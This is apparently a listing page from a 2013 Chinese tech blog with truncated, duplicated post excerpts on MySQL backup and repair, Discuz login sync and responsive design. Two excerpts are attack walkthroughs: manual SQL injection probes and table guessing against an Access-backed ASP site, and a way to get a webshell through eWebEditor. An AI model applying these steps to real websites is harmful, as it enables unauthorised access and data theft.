access手工注入笔记
[ 2013-05-28 17:02:46 | 作者: admin ]
http://www.xxx.com/news.asp?id=6
注入点
判断是否存在注入 两次返回不一样 存在注入
http://www.xxx.com/news.asp?id=6and 1=1
http://www.xxx.com/news.asp?id=6and 1=2
判断数据库 这里可能是本地问题 没有测试出来
and (select count(*) from msysobjects)>0 (返回权限不足access数据库)
and (select count(*) from sysobjects)>0 (返回正常则为MSSQL数据库)
猜解表名(正常则存在admin,不正常则不存在)
and exists (select * from admin)
返回正确 存在admin 我们随便填写一个进去那么 返回错误 不存在这个表
现在我们来猜解字段
...
阅读全文…
注入点
判断是否存在注入 两次返回不一样 存在注入
http://www.xxx.com/news.asp?id=6and 1=1
http://www.xxx.com/news.asp?id=6and 1=2
判断数据库 这里可能是本地问题 没有测试出来
and (select count(*) from msysobjects)>0 (返回权限不足access数据库)
and (select count(*) from sysobjects)>0 (返回正常则为MSSQL数据库)
猜解表名(正常则存在admin,不正常则不存在)
and exists (select * from admin)
返回正确 存在admin 我们随便填写一个进去那么 返回错误 不存在这个表
现在我们来猜解字段
...
阅读全文…
ewebeditor不进后台拿shell的方法
[ 2013-05-28 16:59:49 | 作者: admin ]
在数据库没被删掉的情况下。(默认:/db/ewebeditor.mdb)如果没删掉的话,把数据库给Down下来。
然后打开,查看Style这里,看看“前人”有没有留下痕迹 看看表格内有没有上传过asp asa等这些类型的文件,如果有往下看。
查找到这段:
<IFRAME ID=”eWebEditor1″ SRC=”../eWebEditor/ewebeditor.asp?id=content&style=s_light” FRAMEBORDER=”0″ SCROLLING=”no” WIDTH=”630″ HEIGHT=”420″> </IFRAME>
把那个s_light换成你刚才看到的样式名字,然后把链接补全。
<IFRAME ID=”eWebEditor1″ SRC=www.xxx.com/eWebEditor/ewebeditor.asp?id=content&style=adminone1 ...
阅读全文…
然后打开,查看Style这里,看看“前人”有没有留下痕迹 看看表格内有没有上传过asp asa等这些类型的文件,如果有往下看。
查找到这段:
<IFRAME ID=”eWebEditor1″ SRC=”../eWebEditor/ewebeditor.asp?id=content&style=s_light” FRAMEBORDER=”0″ SCROLLING=”no” WIDTH=”630″ HEIGHT=”420″> </IFRAME>
把那个s_light换成你刚才看到的样式名字,然后把链接补全。
<IFRAME ID=”eWebEditor1″ SRC=www.xxx.com/eWebEditor/ewebeditor.asp?id=content&style=adminone1 ...
阅读全文…
CentOS Linux自动备份MySQL数据库到远程FTP服务器并删除指定日期备份
[ 2013-05-28 16:26:56 | 作者: admin ]
说明:
我这里要把MySQL数据库存放目录/var/lib/mysql下面的pw85数据库备份到/home/mysql_data里面,并且保存为mysqldata_bak_2011_11_03.tar.gz的压缩文件格式(2011_11_03是指备份执行时当天的日期),然后只保留最近7天的备份,再把备份文件通过ftp服务器上传到指定空间,并且在远程ftp服务器只保留最近7天的备份。
实现步骤:
1、创建保存备份文件的目录:/home/mysql_data/
2、创建备份脚本文件:/home/mysql_data/mysql_databak.sh
阅读全文…
我这里要把MySQL数据库存放目录/var/lib/mysql下面的pw85数据库备份到/home/mysql_data里面,并且保存为mysqldata_bak_2011_11_03.tar.gz的压缩文件格式(2011_11_03是指备份执行时当天的日期),然后只保留最近7天的备份,再把备份文件通过ftp服务器上传到指定空间,并且在远程ftp服务器只保留最近7天的备份。
实现步骤:
1、创建保存备份文件的目录:/home/mysql_data/
2、创建备份脚本文件:/home/mysql_data/mysql_databak.sh
#!/bin/sh
DUMP=/usr/bin/mysqldump #mysqldump备份文件执行路径
OUT_DIR=/home/mysql_data #备份存放路径
LINUX_USER=root #系统用户名
DB_NAME=pw85 #要备份的数据库名字
...DUMP=/usr/bin/mysqldump #mysqldump备份文件执行路径
OUT_DIR=/home/mysql_data #备份存放路径
LINUX_USER=root #系统用户名
DB_NAME=pw85 #要备份的数据库名字
阅读全文…
MYSQL数据库的备份和拷贝
[ 2013-05-28 16:20:59 | 作者: admin ]
在重要的表丢失和毁坏时备份您的数据库。如果系统发生崩溃,您就能够将表恢复到崩溃时刻的状态,并尽可能不丢失数据。同样,错发DROP DATABASE 或DROP TABLE 命令的用户可能会向您请求进行数据恢复。有时,这是由MySQL管理员引起的破坏,管理员试图通过使用像vi 或emacs 这样的编辑器直接编辑表文件而毁坏了它们。这样做对表来说肯定是干了坏事。
备份数据库的两种主要方法是使用mysqldump 程序或直接拷贝数据库文件(如便用c p、tar 或c p i o)。每种方法都有自己的优点和缺点:
mysqldump 与MySQL服务器联合进行操作。直接拷贝方法与服务器相脱离,因此必须采取措施确保在进行拷贝时没有客户机在修改这些表。这个问题与利用文件系统备份来备份数据库的问题相同:如果数据库表在文件系统备份时进行更新,则进行备份的表文件处于非一致的状态,并且对于今后恢...
阅读全文…
备份数据库的两种主要方法是使用mysqldump 程序或直接拷贝数据库文件(如便用c p、tar 或c p i o)。每种方法都有自己的优点和缺点:
mysqldump 与MySQL服务器联合进行操作。直接拷贝方法与服务器相脱离,因此必须采取措施确保在进行拷贝时没有客户机在修改这些表。这个问题与利用文件系统备份来备份数据库的问题相同:如果数据库表在文件系统备份时进行更新,则进行备份的表文件处于非一致的状态,并且对于今后恢...
阅读全文…
Discuz!X2.5论坛与品牌空间不能同步登录退出的解决方法
[ 2013-05-27 19:22:41 | 作者: admin ]
由于网站有了论坛与分类信息,现在想加上品牌空间,于是安装了Brand_2.1_GBK,安装很容易,可是发现品牌空间与论坛不能同步登录退出,虽然UCenter应用里显示品牌空间这个应用是通信成功的。可是在DZ论坛上登录后,品牌空间没有同步过来。而反过来,品牌空间登录后,DZ论坛是可以同步的。后来发现是cookie引起的。/config/config_global_default.php文件里有cookie的相关说明:// COOKIE 设置$_config['cookie']['cookiepre'] = 'uchome_'; // COOKIE前缀$_config['cookie']['cookiedomain'] = ''; // COOKIE作用域$_config['cookie']['cookiepath'] ...
阅读全文…
阅读全文…
Fiddler 跟踪 Android 数据包
[ 2013-05-26 12:56:52 | 作者: admin ]
手机网页的自适应网页设计(Responsive Web Design)
[ 2013-05-21 14:21:07 | 作者: admin ]
随着3G的普及,越来越多的人使用手机上网。
移动设备正超过桌面设备,成为访问互联网的最常见终端。于是,网页设计师不得不面对一个难题:如何才能在不同大小的设备上呈现同样的网页?
手机的屏幕比较小,宽度通常在600像素以下;PC的屏幕宽度,一般都在1000像素以上(目前主流宽度是1366×768),有的还达到了2000像素。同样的内容,要在大小迥异的屏幕上,都呈现出满意的效果,并不是一件容易的事。
很多网站的解决方法,是为不同的设备提供不同的网页,比如专门提供一个mobile版本,或者iPhone / iPad版本。这样做固然保证了效果,但是比较麻烦,同时要维护好几个版本,而且如果一个网站有多个portal(入口),会大大增加架构设计的复杂度。
于是,很早就有人设想,能不能”一次设计,普遍适用”,让同一张网页自动适应不同大小的屏幕,根据屏幕宽度,自动调整布局(layout)?
![]()
阅读全文…
阅读全文…
pw论坛mysql数据库修复方法分享
[ 2013-05-21 10:59:30 | 作者: admin ]
http://www.phpwind.net/read/2993118
提笔先感谢云天河大哥又帮了我一次忙,因为MYSQL数据库庞大忘记停止mysql 直接下载了,导致原服务器上mysql挂掉,一个挂掉的提示
Table './qingzhoubbs/pw_usercache' is marked as crashed and last (automatic?) repair failed ( 144 ) 查看错误相关信息
后台 phpmyadmin 都修复了 没有用 自己对liunx 还非常不熟悉
我勒个去 找了几位侠客跟几位论坛的技术 都没搞定
我分享下 云大哥的步骤
环境为阿里云默认的环境
第一步
停止mysql
/alidata/server/mysql-5.1.57/share/mysql/mysql.server stop
第二步
...
阅读全文…
提笔先感谢云天河大哥又帮了我一次忙,因为MYSQL数据库庞大忘记停止mysql 直接下载了,导致原服务器上mysql挂掉,一个挂掉的提示
Table './qingzhoubbs/pw_usercache' is marked as crashed and last (automatic?) repair failed ( 144 ) 查看错误相关信息
后台 phpmyadmin 都修复了 没有用 自己对liunx 还非常不熟悉
我勒个去 找了几位侠客跟几位论坛的技术 都没搞定
我分享下 云大哥的步骤
环境为阿里云默认的环境
第一步
停止mysql
/alidata/server/mysql-5.1.57/share/mysql/mysql.server stop
第二步
...
阅读全文…
